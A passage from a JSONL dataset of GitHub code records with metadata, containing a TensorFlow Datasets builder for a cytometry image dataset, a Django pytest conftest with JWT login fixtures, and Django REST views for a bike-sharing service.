filters=opt.f, colname='country')\n\n df_full_clients = df_clients.join(df_fin, on=['id'], how='inner')\n\n df_full_clients = remove_personal_info(df=df_full_clients, personal_info=['first_name', 'last_name', 'cc_n'])\n\n df_full_clients = rename_columns(df=df_full_clients, columns_to_rename=[('id', 'client_identifier'), ('btc_a', 'bitcoin_address'), ('cc_t', 'credit_card_type')])\n\n save_csv_output_file(df=df_full_clients, path='client_data')", "repo_name": "giuseppefrn/Assignment-KommatiPara", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4004, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 15, "usage_type": "attribute"}, {"api_name": "typing.TypeVar", "line_number": 17, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 18, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 26, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder.master", "line_number": 29, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 29, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pyspark.sql.DataFrame", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 47, "usage_type": "name"}, {"api_name": "pyspark.sql.functions.col", "line_number": 57, "usage_type": "call"}, {"api_name": "pyspark.sql.DataFrame", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 68, "usage_type": "name"}, {"api_name": "pyspark.sql.DataFrame", "line_number": 85, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 97, "usage_type": "call"}]}
+{"seq_id": "16415048403", "text": "\"\"\"romania dataset.\"\"\"\n\nimport tensorflow_datasets as tfds\nimport tensorflow as tf\nimport tifffile as tiff\nimport os\nimport re\n\n_DESCRIPTION = \"\"\"\"\"\"\n\n# TODO(romania): BibTeX citation\n_CITATION = \"\"\"\n\"\"\"\n\n_DATA_OPTIONS = ['all', 'artificial-mixtures', 'metabarcoding', 'metabarcoding2', 'metabarcoding3']\n\n\nclass RomaniaConfig(tfds.core.BuilderConfig):\n \"\"\"BuilderConfig for romania dataset.\"\"\"\n\n def __init__(self, dataset=None, selection=None, **kwargs):\n \"\"\"Constructs a RomaniaConfig.\n\n Args:\n selection: `str`, one of `_DATA_OPTIONS`.\n **kwargs: keyword arguments forwarded to super.\n \"\"\"\n\n if selection not in _DATA_OPTIONS:\n raise ValueError('Selection must be one of %s' % _DATA_OPTIONS)\n\n super(RomaniaConfig, self).__init__(\n version=tfds.core.Version('3.0.0'),\n release_notes={\n '3.0.0': 'new artificial mixtures and metabarcoding configs',\n '2.0.0': 'New dataset, metabarcoding config',\n '1.0.0': 'Full dataset'\n },\n **kwargs)\n self.selection = selection\n self.dataset = dataset\n\n\nclass Romania(tfds.core.GeneratorBasedBuilder):\n \"\"\"DatasetBuilder for romania dataset.\"\"\"\n\n MANUAL_DOWNLOAD_INSTRUCTIONS = \"\"\"\n Place the dataset tar.gz file in the `~/tensorflow_datasets/downloads/manual` dir.\n \"\"\"\n\n # pytype: disable=wrong-keyword-args\n BUILDER_CONFIGS = [\n RomaniaConfig(name='all', selection='all', dataset=\"romania-train-3.0.0.tar.gz\", description='All training samples'),\n RomaniaConfig(name='artificial-mixtures', selection='artificial-mixtures', dataset=\"romania-train-3.0.0.tar.gz\", description='All training samples'),\n RomaniaConfig(name='metabarcoding', selection='metabarcoding', dataset=\"romania-train-3.0.0.tar.gz\", description='Training samples that were identified with metabarcoding'),\n RomaniaConfig(name='metabarcoding2', selection='metabarcoding2', dataset=\"romania-train-3.0.0.tar.gz\", description='Training samples that were identified with metabarcoding, monosamples and art. 
mixtures'),\n RomaniaConfig(name='metabarcoding3', selection='metabarcoding3', dataset=\"romania-train-3.0.0.tar.gz\", description='Training samples that were identified with metabarcoding, additional Hypericum samples')\n ]\n\n # pytype: enable=wrong-keyword-args\n def _info(self) -> tfds.core.DatasetInfo:\n \"\"\"Returns the dataset metadata.\"\"\"\n\n channels = {str(i + 1): tfds.features.Tensor(dtype=tf.uint16, shape=(None, None), encoding='zlib') for i in\n range(6)}\n channels['9'] = tfds.features.Tensor(dtype=tf.uint16, shape=(None, None), encoding='zlib')\n masks = {str(i + 1): tfds.features.Tensor(dtype=tf.uint16, shape=(None, None), encoding='zlib') for i in\n range(6)}\n masks['9'] = tfds.features.Tensor(dtype=tf.uint16, shape=(None, None), encoding='zlib')\n\n features = {'channels': {**channels},\n 'masks': {**masks},\n 'filename': tf.string,\n 'species': tfds.features.ClassLabel(names_file=f'romania/{self.builder_config.selection}-classes-species.txt')}\n\n return tfds.core.DatasetInfo(\n builder=self,\n description=_DESCRIPTION,\n features=tfds.features.FeaturesDict(features),\n supervised_keys=None,\n homepage='https://github.com/lahr/icyt-tfds',\n citation=_CITATION,\n )\n\n def _split_generators(self, dl_manager: tfds.download.DownloadManager):\n \"\"\"Returns SplitGenerators.\"\"\"\n\n path = os.path.join(dl_manager.manual_dir, self.builder_config.dataset)\n\n if not tf.io.gfile.exists(path):\n raise AssertionError(\n f'You must download the dataset .tar.gz file and place it into {dl_manager.manual_dir}')\n\n path_iter = dl_manager.iter_archive(path)\n return {\n 'train': self._generate_examples(path_iter)\n }\n\n def _generate_examples(self, path_iter, split_name=None):\n \"\"\"Yields examples.\"\"\"\n\n path_regex = r'^(?:([^/\\n.A-Z]+)/)?([a-zA-Z]+\\.?[a-zA-Z]+)/(.*)/.*$'\n\n if self.builder_config.selection != 'all':\n with open(f'romania/{self.builder_config.selection}-measurements.txt') as f:\n measurements = tuple([line.rstrip() for line in f])\n\n for filename, fobj in path_iter:\n assert filename is not None\n assert fobj is not None\n\n m = re.match(path_regex, filename)\n\n if self.builder_config.selection != 'all':\n if not m.group(3).startswith(measurements):\n continue\n\n species = m.group(2)\n\n img = tiff.imread(fobj)\n num_channels = img.shape[-1] / 2\n\n if num_channels == 7 or num_channels == 9:\n channels = {str(i + 1): img[:, :, i] for i in range(0, 6)}\n channels['9'] = img[:, :, 6]\n masks = {str(i - 6): img[:, :, i] for i in range(7, 13)}\n masks['9'] = img[:, :, 13]\n\n elif num_channels == 12:\n channels = {str(i + 1): img[:, :, i] for i in range(0, 6)}\n channels['9'] = img[:, :, 8]\n masks = {str(i - 11): img[:, :, i] for i in range(12, 18)}\n masks['9'] = img[:, :, 20]\n\n else:\n raise AssertionError(f'Unknown number of channels ({num_channels}) for file {filename}')\n\n features = {\n 'channels': {**channels},\n 'masks': {**masks},\n 'filename': filename,\n 'species': species}\n\n yield filename, features\n", "repo_name": "lahr/icyt-tfds", "sub_path": "romania/romania.py", "file_name": "romania.py", "file_ext": "py", "file_size_in_byte": 5760, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow_datasets.core", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.core.Version", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow_datasets.core", "line_number": 33, "usage_type": "attribute"}, {"api_name": 
"tensorflow_datasets.core", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.Tensor", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tensorflow.uint16", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.Tensor", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.uint16", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.Tensor", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow.uint16", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.Tensor", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.uint16", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.string", "line_number": 73, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.ClassLabel", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.core.DatasetInfo", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow_datasets.core", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.FeaturesDict", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.core", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.download", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.io.gfile.exists", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 90, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 112, "usage_type": "call"}, {"api_name": "tifffile.imread", "line_number": 120, "usage_type": "call"}]}
+{"seq_id": "14075355", "text": "import pytest\nfrom pytest_factoryboy import register\nfrom graphql_jwt.shortcuts import get_token\n\nfrom factories.plans import PlanFactory\nfrom factories.companies import CompanyFactory\nfrom factories.dealings import DealingFactory\nfrom factories.distribute_logs import DistributeLogFactory\nfrom factories.items import ItemFactory\nfrom factories.exchange_applied_items import ExchangeAppliedItemFactory\nfrom factories.exchanged_item_logs import ExchangedItemLogFactory\nfrom factories.purchased_point_logs import PurchasedPointLogFactory\n\nregister(PlanFactory)\nregister(CompanyFactory)\nregister(DealingFactory)\nregister(DistributeLogFactory)\nregister(ItemFactory)\nregister(ExchangeAppliedItemFactory)\nregister(ExchangedItemLogFactory)\nregister(PurchasedPointLogFactory)\n\nfrom pdb import set_trace as st\n\n\n@pytest.fixture(autouse=True)\ndef test_generate_plan_fixtures(plan_factory):\n plan_factory.create(name=\"free\", fee=0)\n plan_factory.create(name=\"standard\", fee=2000)\n plan_factory.create(name=\"professional\", fee=5000)\n assert True\n\n\n@pytest.fixture\ndef company_fixture(company_factory):\n return company_factory.create(point=1000)\n\n\n@pytest.fixture\ndef create_user_fixture(django_user_model):\n \"\"\"\n userが作成される時に、同時にaccountとprofileも作成される\n \"\"\"\n\n def make_user(**kwargs):\n return django_user_model.objects.create_user(**kwargs)\n\n return make_user\n\n\n# from graphql_jwt.testcases import JSONWebTokenTestCase, JSONWebTokenClient\n# @pytest.fixture\n# def logged_in_client_fixture(company_fixture, create_user_fixture):\n# user = create_user_fixture(\n# email=\"user@test.jp\",\n# password=\"test_password\",\n# company=company_fixture,\n# is_active=True,\n# is_admin=True,\n# )\n\n# client = JSONWebTokenTestCase().client_class()\n# client.authenticate(user)\n# return client, user\n\n\n@pytest.fixture\ndef logged_in_client_fixture(company_fixture, create_user_fixture):\n \"\"\"ログイン済みユーザーのfixture\"\"\"\n user = create_user_fixture(\n email=\"user@test.jp\",\n password=\"test_password\",\n company=company_fixture,\n is_active=True,\n is_admin=True,\n )\n\n headers = {\"HTTP_AUTHORIZATION\": f\"JWT {get_token(user)}\"}\n\n return user, headers\n", "repo_name": "mizutaninaoki/poppie", "sub_path": "test/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 2305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest_factoryboy.register", "line_number": 14, "usage_type": "call"}, {"api_name": "factories.plans.PlanFactory", "line_number": 14, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 15, "usage_type": "call"}, {"api_name": "factories.companies.CompanyFactory", "line_number": 15, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 16, "usage_type": "call"}, {"api_name": "factories.dealings.DealingFactory", "line_number": 16, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 17, "usage_type": "call"}, {"api_name": "factories.distribute_logs.DistributeLogFactory", "line_number": 17, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 18, "usage_type": "call"}, {"api_name": "factories.items.ItemFactory", "line_number": 18, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 19, "usage_type": "call"}, {"api_name": 
"factories.exchange_applied_items.ExchangeAppliedItemFactory", "line_number": 19, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 20, "usage_type": "call"}, {"api_name": "factories.exchanged_item_logs.ExchangedItemLogFactory", "line_number": 20, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 21, "usage_type": "call"}, {"api_name": "factories.purchased_point_logs.PurchasedPointLogFactory", "line_number": 21, "usage_type": "argument"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 39, "usage_type": "attribute"}, {"api_name": "graphql_jwt.shortcuts.get_token", "line_number": 78, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 67, "usage_type": "attribute"}]}
+{"seq_id": "27199747982", "text": "from allauth.socialaccount.models import SocialApp\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.gis.geos import Point\nfrom django.contrib.gis.measure import D\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.contrib.syndication.views import Feed\nfrom django.core.paginator import Paginator\nfrom django.urls import reverse\nfrom django.utils.feedgenerator import Rss201rev2Feed\nfrom django.utils.timezone import now, timedelta\nfrom preferences import preferences\nfrom rest_framework import exceptions, generics, mixins, status, viewsets\nfrom rest_framework.authentication import SessionAuthentication, TokenAuthentication\nfrom rest_framework.decorators import (\n action,\n api_view,\n authentication_classes,\n permission_classes,\n)\nfrom rest_framework.permissions import (\n SAFE_METHODS,\n AllowAny,\n BasePermission,\n IsAuthenticated,\n)\nfrom rest_framework.response import Response\nfrom rest_framework.views import exception_handler\nfrom rest_framework_api_key.permissions import HasAPIKey\n\nfrom bikesharing.models import Bike, Location, LocationTracker, Rent, Station\nfrom cykel.models import CykelLogEntry\n\nfrom .authentication import BasicTokenAuthentication\nfrom .serializers import (\n BikeSerializer,\n CreateRentSerializer,\n LocationTrackerUpdateSerializer,\n MaintenanceBikeSerializer,\n RentSerializer,\n SocialAppSerializer,\n StationSerializer,\n UserDetailsSerializer,\n)\n\n\nclass BikeViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = Bike.objects.all()\n serializer_class = BikeSerializer\n\n\nclass StationViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = Station.objects.all()\n serializer_class = StationSerializer\n\n\nclass CanRentBikePermission(BasePermission):\n \"\"\"The request is authenticated as a user and has add_rent permission.\"\"\"\n\n message = \"You cannot rent a bike at this time.\"\n\n def has_permission(self, request, view):\n if not request.user or not request.user.is_authenticated:\n return False\n\n if request.method in SAFE_METHODS:\n return True\n\n return request.user.has_perm(\"bikesharing.add_rent\")\n\n\nclass CanUseMaintenancePermission(BasePermission):\n \"\"\"The request is authenticated as a user and has maintenance\n permission.\"\"\"\n\n def has_permission(self, request, view):\n if not request.user or not request.user.is_authenticated:\n return False\n\n return request.user.has_perm(\"bikesharing.maintain\")\n\n\n@permission_classes([IsAuthenticated, CanRentBikePermission])\nclass RentViewSet(\n mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n mixins.ListModelMixin,\n viewsets.GenericViewSet,\n):\n def get_serializer_class(self):\n if self.action == \"create\":\n return CreateRentSerializer\n else:\n return RentSerializer\n\n def get_queryset(self):\n user = self.request.user\n return Rent.objects.filter(user=user, rent_end=None)\n\n def create(self, request):\n resp = super().create(request)\n if resp.status_code != status.HTTP_201_CREATED:\n return resp\n\n rent = self.get_queryset().get(id=resp.data[\"id\"])\n\n if rent.bike.state == Bike.State.MISSING:\n data = {}\n if rent.start_location:\n data = {\"location_id\": rent.start_location.id}\n\n CykelLogEntry.objects.create(\n content_object=rent.bike,\n action_type=\"cykel.bike.missing_reporting\",\n data=data,\n )\n\n # override output with RentSerializer\n serializer = RentSerializer(rent, context={\"request\": request})\n headers = self.get_success_headers(serializer.data)\n return 
Response(\n serializer.data, status=status.HTTP_201_CREATED, headers=headers\n )\n\n @action(detail=True, methods=[\"post\"])\n def finish(self, request, pk=None):\n rent = self.get_object()\n\n lat = request.data.get(\"lat\")\n lng = request.data.get(\"lng\")\n\n if rent.user != request.user:\n return Response(\n {\"error\": \"rent belongs to another user\"},\n status=status.HTTP_403_PERMISSON_DENIED,\n )\n if rent.rent_end is not None:\n return Response(\n {\"error\": \"rent was already finished\"}, status=status.HTTP_410_GONE\n )\n\n end_location = None\n if lat and lng:\n end_location = Location.objects.create(\n bike=rent.bike,\n source=Location.Source.USER,\n reported_at=now(),\n geo=Point(float(lng), float(lat), srid=4326),\n )\n\n rent.end(end_location)\n\n return Response({\"success\": True})\n\n @action(detail=True, methods=[\"post\"])\n def unlock(self, request, pk=None):\n rent = self.get_object()\n\n if rent.user != request.user:\n return Response(\n {\"error\": \"rent belongs to another user\"},\n status=status.HTTP_403_PERMISSON_DENIED,\n )\n\n if rent.rent_end is not None:\n return Response(\n {\"error\": \"rent was already finished\"}, status=status.HTTP_410_GONE\n )\n\n try:\n data = rent.unlock()\n except Exception as e:\n print(e)\n return Response({\"success\": False})\n\n return Response({\"success\": True, \"data\": data})\n\n\n@api_view([\"POST\"])\n@permission_classes([HasAPIKey])\ndef updatebikelocation(request):\n device_id = request.data.get(\"device_id\")\n if not (device_id):\n return Response({\"error\": \"device_id missing\"}, status=400)\n try:\n tracker = LocationTracker.objects.get(device_id=device_id)\n except LocationTracker.DoesNotExist:\n return Response({\"error\": \"tracker does not exist\"}, status=404)\n\n serializer = LocationTrackerUpdateSerializer(tracker, data=request.data)\n if not serializer.is_valid():\n return Response(serializer.errors, status=400)\n\n serializer.save()\n\n lat = request.data.get(\"lat\")\n lng = request.data.get(\"lng\")\n accuracy = request.data.get(\"accuracy\")\n loc = None\n\n if lat and lng:\n loc = Location(\n source=Location.Source.TRACKER,\n reported_at=now(),\n tracker=tracker,\n geo=Point(float(lng), float(lat), srid=4326),\n )\n if tracker.bike:\n loc.bike = tracker.bike\n if accuracy:\n loc.accuracy = accuracy\n loc.save()\n\n if tracker.bike:\n bike = tracker.bike\n bike.last_reported = now()\n\n if loc and not loc.internal:\n # check if bike is near station and assign it to that station\n # distance ist configured in prefernces\n max_distance = preferences.BikeSharePreferences.station_match_max_distance\n station_closer_than_Xm = Station.objects.filter(\n location__distance_lte=(loc.geo, D(m=max_distance)),\n status=Station.Status.ACTIVE,\n ).first()\n if station_closer_than_Xm:\n bike.current_station = station_closer_than_Xm\n else:\n bike.current_station = None\n\n bike.save()\n\n someminutesago = now() - timedelta(minutes=15)\n data = {}\n if loc:\n data = {\"location_id\": loc.id}\n\n if tracker.tracker_status == LocationTracker.Status.MISSING:\n action_type = \"cykel.tracker.missing_reporting\"\n CykelLogEntry.create_unless_time(\n someminutesago, content_object=tracker, action_type=action_type, data=data\n )\n\n if tracker.bike and tracker.bike.state == Bike.State.MISSING:\n action_type = \"cykel.bike.missing_reporting\"\n CykelLogEntry.create_unless_time(\n someminutesago,\n content_object=tracker.bike,\n action_type=action_type,\n data=data,\n )\n\n if not loc:\n return Response({\"success\": True, 
\"warning\": \"lat/lng missing\"})\n\n return Response({\"success\": True})\n\n\n@authentication_classes(\n [SessionAuthentication, TokenAuthentication, BasicTokenAuthentication]\n)\n@permission_classes([IsAuthenticated, CanUseMaintenancePermission])\nclass MaintenanceViewSet(viewsets.ViewSet):\n @action(detail=False, methods=[\"GET\"])\n def mapdata(self, request):\n bikes = Bike.objects.filter(location__isnull=False).distinct()\n serializer = MaintenanceBikeSerializer(bikes, many=True)\n return Response(serializer.data)\n\n @action(detail=False, methods=[\"GET\"])\n def logentryfeed(self, request):\n feed = LogEntryFeed()\n return feed(request)\n\n\nclass UserDetailsView(generics.RetrieveAPIView):\n \"\"\"Reads UserModel fields Accepts GET method.\n\n Default accepted fields: username Default display fields: pk,\n username Read-only fields: pk Returns UserModel fields.\n \"\"\"\n\n serializer_class = UserDetailsSerializer\n permission_classes = (IsAuthenticated,)\n\n def get_object(self):\n return self.request.user\n\n def get_queryset(self):\n \"\"\"Adding this method since it is sometimes called when using django-\n rest-swagger https://github.com/Tivix/django-rest-auth/issues/275.\"\"\"\n return get_user_model().objects.none()\n\n\n@permission_classes([AllowAny])\nclass LoginProviderViewSet(\n mixins.ListModelMixin,\n viewsets.GenericViewSet,\n):\n \"\"\"return the configured social login providers.\"\"\"\n\n serializer_class = SocialAppSerializer\n\n def get_queryset(self):\n return SocialApp.objects.filter(sites__id=get_current_site(self.request).id)\n\n\nclass RSS20PaginatedFeed(Rss201rev2Feed):\n def add_root_elements(self, handler):\n super(Rss201rev2Feed, self).add_root_elements(handler)\n\n if self.feed[\"page\"] > 1:\n handler.addQuickElement(\n \"link\",\n \"\",\n {\n \"rel\": \"first\",\n \"href\": self.feed[\"feed_url\"],\n },\n )\n\n if self.feed[\"page\"] < self.feed[\"last_page\"]:\n handler.addQuickElement(\n \"link\",\n \"\",\n {\n \"rel\": \"last\",\n \"href\": (f\"{self.feed['feed_url']}?page={self.feed['last_page']}\"),\n },\n )\n\n if self.feed[\"page\"] > 1:\n handler.addQuickElement(\n \"link\",\n \"\",\n {\n \"rel\": \"previous\",\n \"href\": (f\"{self.feed['feed_url']}?page={self.feed['page'] - 1}\"),\n },\n )\n\n if self.feed[\"page\"] < self.feed[\"last_page\"]:\n handler.addQuickElement(\n \"link\",\n \"\",\n {\n \"rel\": \"next\",\n \"href\": (f\"{self.feed['feed_url']}?page={self.feed['page'] + 1}\"),\n },\n )\n\n\nclass LogEntryFeed(Feed):\n feed_type = RSS20PaginatedFeed\n\n def title(self):\n return f\"Maintenance Events of {preferences.BikeSharePreferences.system_name}\"\n\n def description(self):\n return self.title()\n\n def link(self):\n return reverse(\n \"admin:%s_%s_changelist\"\n % (CykelLogEntry._meta.app_label, CykelLogEntry._meta.model_name)\n )\n\n def get_entries(self, request):\n return CykelLogEntry.objects.order_by(\"-timestamp\").all()\n\n def get_object(self, request):\n page = int(request.GET.get(\"page\", 1))\n entries = self.get_entries(request)\n paginator = Paginator(entries, 25)\n return {\"page\": page, \"paginator\": paginator}\n\n def items(self, obj):\n return obj[\"paginator\"].get_page(obj[\"page\"])\n\n def feed_extra_kwargs(self, obj):\n context = super().feed_extra_kwargs(obj)\n context[\"page\"] = obj[\"page\"]\n context[\"last_page\"] = obj[\"paginator\"].num_pages\n return context\n\n def item_title(self, item):\n return item.display()\n\n def item_pubdate(self, item):\n return item.timestamp\n\n def 
item_updateddate(self, item):\n return item.timestamp\n\n def item_description(self, item):\n return self.item_title(item)\n\n def item_link(self, item):\n return reverse(\n \"admin:%s_%s_change\" % (item._meta.app_label, item._meta.model_name),\n args=[item.id],\n )\n\n\nclass FilteredLogEntryFeed(LogEntryFeed):\n def get_entries(self, request):\n return CykelLogEntry.objects.order_by(\"-timestamp\").all()\n\n\ndef custom_exception_handler(exc, context):\n response = exception_handler(exc, context)\n if response is None:\n return None\n\n headers = {}\n if isinstance(exc, exceptions.APIException):\n if getattr(exc, \"auth_header\", None):\n headers[\"WWW-Authenticate\"] = exc.auth_header\n\n errors = []\n if getattr(exc, \"detail\", None):\n if isinstance(exc.detail, list):\n errors.append({\"detail\": exc.detail})\n elif isinstance(exc.detail, dict):\n for key, value in exc.detail.items():\n if isinstance(value, list):\n for item in value:\n errors.append({\"detail\": item, \"source\": key})\n else:\n errors.append({\"detail\": value, \"source\": key})\n else:\n errors.append({\"detail\": exc.detail})\n else:\n errors.append({\"detail\": str(exc)})\n\n messages = []\n for item in errors:\n if getattr(item[\"detail\"], \"code\", None):\n item[\"code\"] = item[\"detail\"].code\n messages.append(item[\"detail\"])\n\n data = {\"errors\": errors, \"message\": \"\\n\".join(messages)}\n return Response(data, status=response.status_code, headers=headers)\n", "repo_name": "transportkollektiv/cykel", "sub_path": "api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 13786, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 80, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 46, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 46, "usage_type": "name"}, {"api_name": "bikesharing.models.Bike.objects.all", "line_number": 47, "usage_type": "call"}, {"api_name": "bikesharing.models.Bike.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Bike", "line_number": 47, "usage_type": "name"}, {"api_name": "serializers.BikeSerializer", "line_number": 48, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 51, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 51, "usage_type": "name"}, {"api_name": "bikesharing.models.Station.objects.all", "line_number": 52, "usage_type": "call"}, {"api_name": "bikesharing.models.Station.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Station", "line_number": 52, "usage_type": "name"}, {"api_name": "serializers.StationSerializer", "line_number": 53, "usage_type": "name"}, {"api_name": "rest_framework.permissions.BasePermission", "line_number": 56, "usage_type": "name"}, {"api_name": "rest_framework.permissions.SAFE_METHODS", "line_number": 65, "usage_type": "name"}, {"api_name": "rest_framework.permissions.BasePermission", "line_number": 71, "usage_type": "name"}, {"api_name": "rest_framework.mixins.CreateModelMixin", "line_number": 84, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 84, "usage_type": "name"}, {"api_name": "rest_framework.mixins.RetrieveModelMixin", "line_number": 85, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 85, "usage_type": "name"}, {"api_name": 
"rest_framework.mixins.ListModelMixin", "line_number": 86, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 86, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 87, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 87, "usage_type": "name"}, {"api_name": "serializers.CreateRentSerializer", "line_number": 91, "usage_type": "name"}, {"api_name": "serializers.RentSerializer", "line_number": 93, "usage_type": "name"}, {"api_name": "bikesharing.models.Rent.objects.filter", "line_number": 97, "usage_type": "call"}, {"api_name": "bikesharing.models.Rent.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Rent", "line_number": 97, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 101, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 101, "usage_type": "name"}, {"api_name": "bikesharing.models.Bike.State", "line_number": 106, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Bike", "line_number": 106, "usage_type": "name"}, {"api_name": "cykel.models.CykelLogEntry.objects.create", "line_number": 111, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry.objects", "line_number": 111, "usage_type": "attribute"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 111, "usage_type": "name"}, {"api_name": "serializers.RentSerializer", "line_number": 118, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 120, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 121, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 121, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 132, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_403_PERMISSON_DENIED", "line_number": 134, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 134, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 137, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_410_GONE", "line_number": 138, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 138, "usage_type": "name"}, {"api_name": "bikesharing.models.Location.objects.create", "line_number": 143, "usage_type": "call"}, {"api_name": "bikesharing.models.Location.objects", "line_number": 143, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Location", "line_number": 143, "usage_type": "name"}, {"api_name": "bikesharing.models.Location.Source", "line_number": 145, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Location", "line_number": 145, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 146, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.Point", "line_number": 147, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 152, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 124, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 159, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_403_PERMISSON_DENIED", "line_number": 161, "usage_type": 